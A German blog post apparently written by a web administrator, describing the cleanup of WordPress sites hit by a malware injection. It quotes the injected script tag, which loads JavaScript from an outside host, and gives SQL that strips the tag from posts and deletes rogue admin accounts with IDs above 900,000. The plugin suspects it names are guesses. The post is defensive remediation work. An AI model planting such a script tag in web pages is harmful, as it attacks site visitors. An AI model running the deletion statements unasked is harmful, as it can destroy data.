Nachdem ich gerade für einen Kunden mehrere Wordpress-Seiten von einer in dieser Form noch nicht dokumentierten Malware-Attacke befreit habe, dachte ich mir, dass ich den SQL-Code hier veröffentliche, der die Probleme bereinigt: Der Schadcode lautet: <script src='https://js.wiilberedmodels.com/pystats.js?l=l&' type=text/javascript language=javascript></script>
Folgende Fixes können zB per phpMyAdmin bei der betroffenen Datenbank eingespielt werden: UPDATE `wp_posts` SET post_content=REPLACE(post_content,"<script src='https://js.wiilberedmodels.com/pystats.js?l=l&' type=text/javascript language=javascript></script>","");
Es wird auch ein Admin-User mit unterschiedlichem Namen und einer ID > 900.000 angelegt. Diese könnt ihr händisch löschen. Folgendes SQL-Statement löscht euch alle User mit einer ID > 900.000 aus den Tabellen und setzt den Autoincrement-Wert der Tabellen zurück. DELETE FROM `wp_users` WHERE `wp_users`.`ID` > 900000;
DELETE FROM `wp_usermeta` WHERE `wp_usermeta`.`user_id` > 900000;
ALTER TABLE `wp_users` AUTO_INCREMENT = 1;
ALTER TABLE `wp_usermeta` AUTO_INCREMENT = 1;
Wichtig #1: Falls ein Cache-Plugin verwendet wird (WP SuperCache oder W3 Total Cache zB), dann muss der jeweilige Cache ebenfalls geleert werden! Wichtig #2: Vor dem Ausführen des Codes sollte unbedingt die Datenbank gebackupt werden! Ich bin nicht für einen Datenverlust verantwortlich. Derzeit gibt es noch keine Details wie der Schadcode in die Datenbank gelangt. Wahrscheinlich über eine Schwachstelle eines Wordpress-Plugins. Ich verdächtige derzeit den Advanced Access Manager oder das "Cookie Notice"-Plugin. Mehr Zeit hatte ich leider nicht. Ich bin mir sicher, dass in den nächsten Tagen mehr dazu auftaucht.
|